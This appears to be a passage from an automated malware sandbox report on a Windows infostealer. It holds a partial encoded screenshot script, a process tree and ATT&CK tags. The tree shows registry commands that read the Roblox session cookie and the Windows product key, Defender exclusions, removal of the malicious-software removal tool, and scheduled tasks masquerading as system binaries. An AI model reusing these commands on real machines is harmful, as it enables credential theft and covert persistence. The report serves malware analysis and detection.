ACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=6⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2ymrjypg\2ymrjypg.cmdline"7⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8AFA.tmp" "c:\Users\Admin\AppData\Local\Temp\2ymrjypg\CSC1C69F80EBA8B419D8D1ABC2FDFE5C6C9.TMP"8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6812 -s 2966⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI51162\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\0IWAg.zip" *"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\_MEI51162\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI51162\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\0IWAg.zip" *6⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault6⤵
-
C:\Users\Admin\AppData\Local\Temp\Msvchost.exe"C:\Users\Admin\AppData\Local\Temp\Msvchost.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft_WindowsDefender" /tr "C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /f /tn "Microsoft_WindowsDefender"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF98F.tmp.bat""4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Windows\Globalization\Time Zone\conhost.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\Globalization\Time Zone\conhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Windows\Globalization\Time Zone\conhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Webdriversession\conhost.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Webdriversession\conhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Webdriversession\conhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Webdriversession\cmd.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Webdriversession\cmd.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Webdriversession\cmd.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\sysmon.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sysmon.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\sysmon.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 8 /tr "'C:\Windows\ImmersiveControlPanel\sihost.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Windows\ImmersiveControlPanel\sihost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Windows\ImmersiveControlPanel\sihost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\conhost.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\conhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\conhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Windows\de-DE\conhost.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\de-DE\conhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Windows\de-DE\conhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "tasklistt" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Templates\tasklist.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "tasklist" /sc ONLOGON /tr "'C:\Users\All Users\Templates\tasklist.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "tasklistt" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Templates\tasklist.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Microsoft_RM" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Documents\Microsoft_R.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Microsoft_R" /sc ONLOGON /tr "'C:\Users\All Users\Documents\Microsoft_R.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Microsoft_RM" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Documents\Microsoft_R.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Program Files\Common Files\microsoft shared\Triedit\dllhost.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Common Files\microsoft shared\Triedit\dllhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Program Files\Common Files\microsoft shared\Triedit\dllhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\ProgramData\nalfdgwigwyg\lhhsgwktkatl.exeC:\ProgramData\nalfdgwigwyg\lhhsgwktkatl.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵
-
C:\Windows\system32\dialer.exedialer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv fk/+Xas9Bky4Mx4mj7mx0w.0.21⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 1bab1a9a26ca132562d847d43cc34366 fk/+Xas9Bky4Mx4mj7mx0w.0.1.0.0.01⤵
- Sets service image path in registry
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Scheduled Task/Job
1Persistence
Create or Modify System Process
2Windows Service
2Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\USOPrivate\UpdateStore\store.dbFilesize
60KB
MD5485262105c13e60419d5a7a040b0012a
SHA1426bb96598e52250f2fc8c1bbef3bddfc8362c71
SHA25672c0bcbacb06651a1f798ba71d21946c1955865be5b4fca7e7413c2dd6e8e7fd
SHA5124750ad9928301bf3223dba6220b77f0c39af86c57db2946538ebb186ccba082b61ea1f423b7e5bf9f6ff6431df329f01f4e9113e0a24238156a05d6c2159108c
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\tasklist.exe.logFilesize
1KB
MD5baf55b95da4a601229647f25dad12878
SHA1abc16954ebfd213733c4493fc1910164d825cac8
SHA256ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924
SHA51224f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.chkFilesize
8KB
MD54797c6d08d459ddc7cb36fdb0c8b8250
SHA1e2c9f1a8a2c828032a2852d75529723db86b70a7
SHA256ae9f7b8b354320934369d8b892f4047da12e3052fe7ef0440f13b0e34b819b84
SHA51276b39ce119bcbcdee96a6fc4f4f029293bb6d27d1ebfdab10e7a2133733e3febe07ac4e3f11e170c911a1a72391e4e308a88dec529bfeb768aee364bd4e3c019
-
C:\Users\Admin\AppData\Local\Temp\3nbSpuPGZ3.tmpFilesize
20KB
MD542c395b8db48b6ce3d34c301d1eba9d5
SHA1b7cfa3de344814bec105391663c0df4a74310996
SHA2565644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d
SHA5127b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845
-
C:\Users\Admin\AppData\Local\Temp\D1eWsYWS1P.tmpFilesize
46KB
MD58f5942354d3809f865f9767eddf51314
SHA120be11c0d42fc0cef53931ea9152b55082d1a11e
SHA256776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea
SHA512fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218
-
C:\Users\Admin\AppData\Local\Temp\DhQ0eklX3A.tmpFilesize
124KB
MD59618e15b04a4ddb39ed6c496575f6f95
SHA11c28f8750e5555776b3c80b187c5d15a443a7412
SHA256a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
SHA512f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26
-
C:\Users\Admin\AppData\Local\Temp\FPu8MzSOOY.tmpFilesize
20KB
MD549693267e0adbcd119f9f5e02adf3a80
SHA13ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2
-
C:\Users\Admin\AppData\Local\Temp\I5SDNBpYBR.tmpFilesize
152KB
MD573bd1e15afb04648c24593e8ba13e983
SHA14dd85ca46fcdf9d93f6b324f8bb0b5bb512a1b91
SHA256aab0b201f392fef9fdff09e56a9d0ac33d0f68be95da270e6dab89bb1f971d8b
